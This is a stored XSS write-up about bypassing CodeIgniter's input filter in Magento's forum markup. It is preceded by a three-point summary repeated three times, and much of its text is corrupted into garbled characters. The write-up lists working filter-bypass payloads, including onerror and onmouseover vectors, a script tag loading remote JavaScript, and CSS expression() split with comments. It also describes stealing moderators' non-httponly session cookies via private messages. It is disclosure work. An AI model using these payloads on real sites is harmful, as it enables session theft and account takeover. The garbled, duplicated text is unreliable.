1. The document describes a stylish cross-site scripting (XSS) vulnerability found in Magento, an e-commerce platform.
2. The author was able to bypass input sanitization from CodeIgniter, an open-source web application framework used by Magento, and execute JavaScript code by abusing Magento's rich text formatting features and allowed HTML tags.
3. By setting JavaScript code as the value of CSS style properties like "width" or using multi-line comments, the author was able to execute the code despite CodeIgniter's input filtering. This allowed executing arbitrary JavaScript on the site.
1. The document describes a stylish cross-site scripting (XSS) vulnerability found in Magento, an e-commerce platform.
2. The author was able to bypass input sanitization from CodeIgniter, an open-source web application framework used by Magento, and execute JavaScript code by abusing Magento's rich text formatting features and allowed HTML tags.
3. By setting JavaScript code as the value of CSS style properties like "width" or using multi-line comments, the author was able to execute the code despite CodeIgniter's input filtering. This allowed executing arbitrary JavaScript on the site.
1. The document describes a stylish cross-site scripting (XSS) vulnerability found in Magento, an e-commerce platform.
2. The author was able to bypass input sanitization from CodeIgniter, an open-source web application framework used by Magento, and execute JavaScript code by abusing Magento's rich text formatting features and allowed HTML tags.
3. By setting JavaScript code as the value of CSS style properties like "width" or using multi-line comments, the author was able to execute the code despite CodeIgniter's input filtering. This allowed executing arbitrary JavaScript on the site.
How to bypass CodeIgniter in a Real World Setting?
by Ashar a!ed https:""twitter#$o%"soa&'(()ashar Normally I do not write about XSS findings in the form of a write-up (I always prefer tweet) unless it is interesting (e.g., http://www.sribd.om/do/!""#$!%&$/Stored-XSS-in-'witter-'ranslation), funny (e.g., http://issuu.om/msashar(a)ed/dos/urlwriteup) or worth sharing (e.g., http://www.sribd.om/do/!"*"!"+"!/XSS-is-not-going-anywhere). 'his XSS in ,agento is interesting, funny and worth sharing. -urther, this XSS is not about alert or money. It is about passion and lo)e. -urthermore, this story shows you how to bypass .CodeIgniter/ --- one of the most popular 010-based web appliation framewor2 in a real world setting or this is a real world 3'-. Some of my XSS findings are a)ailable in the presentation (http://slid.es/msashar(a)ed/ross- site-sripting-my-lo)e) that I had gi)en at 4S5 6urope !*"# as a part of 785S0 Seminar. ,a2e sure to press the downward arrow (*) for eah XSS e9amples: e9plaination. ,agento 3ommere (https://www.magentoommere.om) --- an ebay inc $o%pany, is one of the leading pro)iders of eommere-based solutions. ,agento had announed a bug bounty program: (http://magento.om/seurity) few months ago. ,agento allows following set of mar2-ups (shown in -igure gi)en below) if you wish to post a ;uestion on forums (http://www.magentoommere.om/boards/newtopi/) or wish to reply someone:s post (http://www.magentoommere.om/boards/newreply/), want to send a pri)ate message to members of forums (http://www.magentoommere.om/boards/member/messages/pm/) and feature is also a)ailable as a part of forum:s signature (https://www.magentoommere.om/produts/ustomer/aount/editsignature/). ,agento is also using this mar2-up feature on its subdomains li2e: http://enterprise.magento.om/ and http://go.magento.om/. In short this feature is e)erywhere on the site. ,agento:s mar2-up or rih te9t or 8<SI8<= feature is pretty restrited and only allows few harmless tags i.e., bold, itali, underline, ;uote, ode, mailto and anhor tag. 5t the same time, user an also set .si+e/ and .$olor/ properties of the abo)e mentioned tags, as a part of style attribute. Now lets desribe how these tags wor2 in a normal manner: 'he following input mentioned in the left olumn will result in ... >b?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b? >i?itali>/i? >u?underline>/u? >;uote?;uote>/;uote? >ode?ode>/ode? >emailA(ustasharBhotmail.om?reah me>/email? >urlAhttp://www.bbnews.om?'op Stories>/url? I try to brea2 down the abo)e input into parts e.g., >b?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b? is internally treated as: ,b-,span style./0ont1si+e:'(p23/-,span style./$olor:blue3/-bold,"span-,"span-,"b- 4ui$5 6est 1111111111111 5s a part of ;ui2 test, I initially tried the most ommon XSS )etor: i.e., CDEimg srA9 onerrorAprompt(")FD and site has on)erted this atta2 )etor into: >xonerror=prompt(1); 5NG as a part of seond try, I used the following XSS )etor (I wanted to see 1',Hi beause it seems XSS was not wor2ing) :CDDEmar;ueeDEimg srA9 onerrorAonfirm(doument.oo2ie)DE/mar;ueeDCDE/plainte9tIDE/J IDEplainte9t/onmouseo)erAprompt(")DCDEsriptDalert(doument.domain) E/sriptDBgmail.omEisinde9 formationA(a)asript:alert(/XSS/) typeAsubmitD:-- DCDE/sriptDEsriptDalert(")E/sriptDCDEimg/idAConfirmKlparF"KL9!MFC/altAC/CsrAChttp://www.i eee-seurity.org/images/new-web/'ro(anN1orse.(pgConmouseo)erAe)al(idKL9!MFD:CDEimg srAChttp://bryanhallsawa2ening.files.wordpress.om/!*"#/*M/anonymousbigbrotherlo ne.(pgC/ onmouso)erAalert(")DEsript/K'abF srA:https://dl.dropbo9.om/u/"#*"%*&%/(s.(s: /K'abFDE/sriptD and it has been on)erted into: >><marquee>x onerror=confirm([removed])<marquee>!><plaintext"><#"><plaintextonmou$eover=promp t(1)>!>alert(document.domain)%&mail.com<i$index formaction=[removed]alert('(() type=$u)mit>*++ >!>alert(1)!><im&id=!confirm(1)!alt=!!$rc=!,ttp-....ieee+ $ecurity.or&ima&e$ne.+ .e)/ro0an12or$e.0p&!onmou$eover=eval(id)>>,ttp-)ryan,all$a.a3enin&.file$..ordpre$$.com 451657anonymou$)i&)rot,erclone.0p& In short the abo)e )etor also does not wor2 but if you notied the underlined stuff (i.e., 7re%o!ed8) in the on)erted )etor, it shows that the site is using CodeIgniter O 5 popular 010-based web appliation framewor2. 6)er wondered how 3odeIgniter wor2s for XSS mitigation, I would li2e to refer you to: https://github.om/6llisHab/3odeIgniter/blob/de)elop/system/ore/Seurity.phpLH"!% 5s part of 3odeIgniter:s feature: it simply tries to loo2 for some bla2-listed words li2e .doument.oo2ie/, .(a)asript/ et and then try to hange these words into 7re%o!ed8 and the goal is to mitigate the affet of Pa)aSript. If you would li2e to see what I already did with 3odeIgniter (bypassed se)eral times), please see: https://github.om/6llisHab/3odeIgniter/issues/!$$Q. 4afay (https://twitter.om/rafaybaloh) and ,athias (https://twitter.om/a)lidienbrunn) also partiipated in this bug report and found bypasses. 'he summary so far is the most ommonly used XSS atta2 )etor and the )etor that I often used, do not wor2 R At this point, I am pretty sure most of the respected bug bounty hunters and f**king automation tools stop at this point and will start looking for other low hanging fruits :) This X is out of scope for any automation tools out there 8ut for me it 9(ound$ :,allen&in& ; $o More 6esting 111111111111111 Hets try .on%ouseo!er/ or .on%ouse%o!e/ et stuff in the allowed mar2-ups and see what happens. e.g., >b/onmouseo)erAalert(")?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b? 5NG/74 >b onmouseo)erAalert(")?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b? Soth abo)e mentioned )ariations also do not wor2 and internally site treat them as: 7utput loo2s li2e: If you remembered, one of the allowed mar2-up is an anhor i.e., ,a- tag (i.e., >urlAhttp://www.bbnews.om?'op Stories>/url?). 'he immediate thought ame to my mind was: I should try XSS )ia a!as$ript (i.e., (a)asript:alert(")) and/or data 9RI (i.e., data:te9t/htmlFbase$+,01N!TyM)bm9)<8UM<89lnUo,i2V)R Hets input R >urlA(a)asript:alert(")?'op Stories>/url? 5NG/74 >urlAdata:te9t/htmlFbase$+,01N!TyM)bm9)<8UM<89lnUo,i2V?'op Stories>/url? 'he abo)e two forms of in(etions also do not wor2 and internally site treats them as: If you loo2 losely at the abo)e figure, you will see http:"" has been appended before Pa)asript and data W4I R whih ma2es them WS6H6SS. 5t the same time, again 3odeIgniter omes into ation and on)erts .&a!as$ript/ word into the string .7re%o!ed8/ in the first )ariation. 'he ne9t thing, I tried is: >urlA(aK'abF)asK'abFript:alertKlparF"KrparF?'op Stories>/url? and the sole purpose is to defeat 3odeIgniter:s bla2-listed term .&a!as$ript/ with the help of 1',H& entities. Sut ,agento on)erts the abo)e in(etion into (K is on)erted into respeti)e entity i.e., KampF): Ea hrefAChttp://(aKampF'ab)asKampF'abript:alertKampFlpar"KampFrparC targetACNblan2CD'op StoriesE/aD At this point of time, I am in need of a !cup of tea" so !Tea Time" :#) 5s soon as I finished a .cup of tea/, an immediate thought ame to my mind that I should try XSS )ia .style/ attribute (that:s why Stylish XSS :)). 0lease 2eep in mind the abo)e mentioned allowed proedure of setting a .style/ on allowed mar2-ups: 'he following input >b?>si@eA+?>olorAblue?bold>/si@e?>/olor?>/b? is treated internally as:
,b-,span style./0ont1si+e:'(p23/-,span style./$olor:blue3/-bold,"span-,"span-,"b- It means, if we speify a style, then site dynamially generates a ,span- tag along with .style/ attribute and assign the )alue of mentioned si@e and gi)en olor to it. 'he initial goal I ha)e in my mind is to e9eute Pa)asript )ia 3SS 69pressions i.e., 2:e2pression:alert:';; or width:e2pression:alert:';;. 'he Pa)asript e9eution )ia 3SS e9pressions (in old I6 browsers) has been 2nown sine ages and has been already disussed in http://sla.2ers.org/forum/inde9.php and https://www.owasp.org/inde9.php/XSSN(3rossNSiteNSripting)N0re)entionN3heatNSheet So as a part of ne9t step, I tried R >b?>si@eA+?>olorAwidth:e9pression(alert("))?bold>/si@e?>/olor?>/b? whih beomes: 5gain 3odeIgniter omes into ation (see figure abo)e) and has remo)ed the bla2-listed word i.e., .e2pression/. In order to defeat bla2-listed word .e2pression/, a 2nown tehni;ue has also been disussed at http://sla.2ers.org/forum/inde9.php and the tehni;ue is: .e2pre"<<"ssion/ i.e., use of multi-line omments inside the word .e2pression/ and I6Q simply ignores /XX/ and Pa)asript )ia 3SS e9pression gets e9euted. So lets hange the )etor that will use .e2pre"<<"ssion/. >b?>si@eA+?>olorAwidth:e9pre/XX/ssion(alert("))?bold>/si@e?>/olor?>/b? So it seems, with the help of /XX/, the abo)e in(etion bypasses 3odeIgniter:s bla2-listed word .e2pression/ and it loo2s li2e: SW' still Pa)asript does not gets e9euted in I6Q and the reason is: .$olor/ 3SS property. In 3SS, the standard way to assign a )alue to a property is:
CSS=roperty>a%e: ?alue In abo)e ase (see figure abo)e), browser onsiders .width/ as a )alue of .$olor/ property whih is basially nothing and .width:e2pre"<<"ssion/ ne)er gets e9euted. 'he following is the sreen-shot of soure ode in I6Q browser: 6he proble% in hand is $%& T% '(T )I* %+ .$olor/ property so that I an use .width:e2pre"<<"ssion:alert:';;/ (width as property name and e9pression as its )alue). 'he site:s user-interfae only allows .olor/ and .si@e/ properties. 7ne more thing that you may ha)e notied in the abo)e sreen-shot is alert(") beomes alert@A)B3'@A)'3 . 'his shows 3odeIgniter again omes into ation :) 3odeIgniter on)erts bla2-listed 2eyword .alert:';/, if found in input, but this time instead of using .7re%o!ed8/, 3odeIgniter only on)erts ( and ) into respeti)e deimal enoded form. I thin2 this is the implementation flaw of 3odeIgniter beause e)en if ( and ) are on)erted into deimal entities, they will still wor2 in Pa)asript onte9t (later you will see a sreen-shot)R 74 as an alternate way or proof of onept, you an simply use .$on0ir%/ or .pro%pt/ R <n real life attac3 $cenario= attac3er doe$ not need alert= confirm or prompt ; -+) 5t this time, a weird idea omes to my mind and the idea is: &$AT &I,, $A--(. I+ I &I,, /( !T0,(" TA' i1e1, 7style8###7"style8 2in the allowed mark#up synta3)4 6he reason is: site is allowing style attributeC %ay be it will allow style tag also or %ay be de!elopers will do a %ista5e in i%ple%entation and will not di00erentiate style attribute and style tag :1; So I deided to input the following: >b?>styleAwidth:e9pre/XX/ssion(alert("))?bold>/style?>/b? and it beomes: ,span $lass./width:e2pre"<<"ssion:alert:';;/-bold,"span- It means that this time, ,agento has generated a ,span- tag but without .style/ attribute. Instead of dynamially generating the .style/ attribute, ,agento has reated a .$lass/ attribute. 7ne thing, we already 2now: .style/ attribute is allowed but pre)iously it wor2ed only with .si+e/ and .$olor/ properties. As a part of ne3t step, what will happen if I will use 5style6 tag 2i1e, 7style879style8) along with !style" attribute4 Now our abo)e in(etion beomes: >b?>styleAstyleAwidth:e9pre/XX/ssion(alert("))?bold>/style?>/b? and the site on)erts the abo)e in(etion into: ,span $lass./style.width:e2pre"<<"ssion:alert:';;/-bold,"span- Wnfortunately this again does not wor2 beause browser treats styleAwidth:e9pre/XX/ssion(alert(")) as a )alue of .$lass/ attribute SW' the good thing is that I had now =6' 4IG 7- .$olor/ property and the only thing left is 6D ERFAG D96 DH 6HF A66RIE96F CD>6FX6 i.e., in this ase .$lass/ attribute. Now we only need ID9EJF 49D6FS at first sightR :-) So new in(etion now loo2s li2e: >b?>styleACstyleAwidth:e9pre/XX/ssion(alert("))?bold>/style?>/b? and this time, ,agento has on)erted the abo)e in(etion into: Espan lassACC styleACwidth:e9pre/XX/ssion(alert("))K;uotFCDboldE/spanD 'hough we ha)e (umped out from the attribute onte9t but still we need the )alue of .style/ attribute that loo2s li2e: style./width:e2pre"<<"ssion:alert:';;/ in order to get Pa)asript e9euted )ia 3SS e9pressions. If you loo2 losely, site automatially inserts ending/losing / :double Kuotes; in order to properly lose the attribute )alue. -inally our in(etion is: >b?>styleACstyleAwidth:e9pre/XX/ssion(alert(")) (un2te9t?bold>/style?>/b? and this time ,agento beha)es li2e a good hild: Espan lassACC styleACwidth:e9pre/XX/ssion(alert("))C (un2te9tCACCDboldE/spanD So now all set for an XSS in I6Q R Sut after XSSed, following ;uestions ame to my mind R I IT (.%/'$ T% $A:( A. X T$AT %.,0 &%); I. I(<4 &$% =A)( A>%/T X T$AT &I,, %.,0 &%); I. I(<4 =A. I =%.:()T T$I X I.T% A. X T$AT &%); I. ?%*(). >)%&()4 Jets Io It If you remembered orretly, as soon as we ha)e in(eted >style?>/style? mar2-up, ,agento has dynamially reated a .$lass/ attribute. e.g., >b?>styleA?bold>/style?>/b? has been on)erted into: ,span $lass.//-bold,"span- It means, now we an try .on%ouseo!er/ stuff along with .style/ tag and this should wor2 R So our -IN5H in(etion that wor2s in latest 3hrome browser will be now loo2s li2e: 7b87style./on%ouseo!er./alert:$oo5ie;38bold7"style87"b8 'he first C will brea2 out from the attribute onte9t while seond C will hold alert(oo2ie) in the following manner: Calert(oo2ie)C. 'he abo)e in(etion has been on)erted into ... Espan lassACC onmouseo)erACalert(oo2ie)FCDboldE/spanD Here is the s$reen1shot o0 the $ode in Chro%e:
7ne thing you may ha)e notied that I ha)e used .$oo5ie/ instead of .do$u%ent#$oo5ie/. 'he reason is 3odeIgniter beause it remo)ed .do$u%ent#$oo5ie/, if found in input string R SW' 817 N66GS a .do$u%ent#$oo5ie/ when one an use .$oo5ie/ or on the following W4H, you will find !* plus uni;ue ways of aessing a oo2ie R http://pastie.org/pri)ate/n2ryfy+Ml"oy%h)blhM*; If you will use .do$u%ent#$oo5ie/, then in(etion loo2s li2es the following and does not wor2: Now its time to see XSS in latest 3hrome and another up of tea R. :-) 5nother thing, I ha)e notied is that .=H=SFSSII/ oo2ie is not httponly# It means, an atta2er an easily steal the session oo2ie of HDR9M MDIFRA6DRS or ,agento:s team member by simply sending a 04IY5'6 ,6SS5=6. In order to see who is moderating the forums, on the following W4H: http://www.magentoommere.om/boards/, if you will sroll down the page, the page shows list of ati)e members and the usernames of moderators ha)e been highlighted e.g., http://www.magentoommere.om/boards/member/#%!%M$/ http://www.magentoommere.om/boards/member/"$##"%/ http://www.magentoommere.om/boards/member/"#MM*Q/ 'his type of atta2 (i.e., stealing session oo2ies )ia XSS on forums) has already been used suessfully in ase of Wbuntu -orums (http://blog.anonial.om/!*"#/*Q/#*/ubuntu-forums-are- ba2-up-and-a-post-mortem/) and 5pple de)elopers forums (http://mytehblog.om/other/apple/apple-de)eloper-website-ha2ed-what-happened/ ) ... 'his XSS has been fi9ed and it too2 ,agento three and half months for the fi9. 5s a part of an e9erise you guys may try to brea2 the fi9 :) 0lease let me 2now your feedba2 on this R Hu2ily one an still see this XSS li)e here (old post is still there and they forgot to delete it): http://www.magentoommere.om/boards/)iewthread/%QQ&$$/ 7ne you will open this W4H, please .Io not bring your %ouse o!er the word bold/ F-)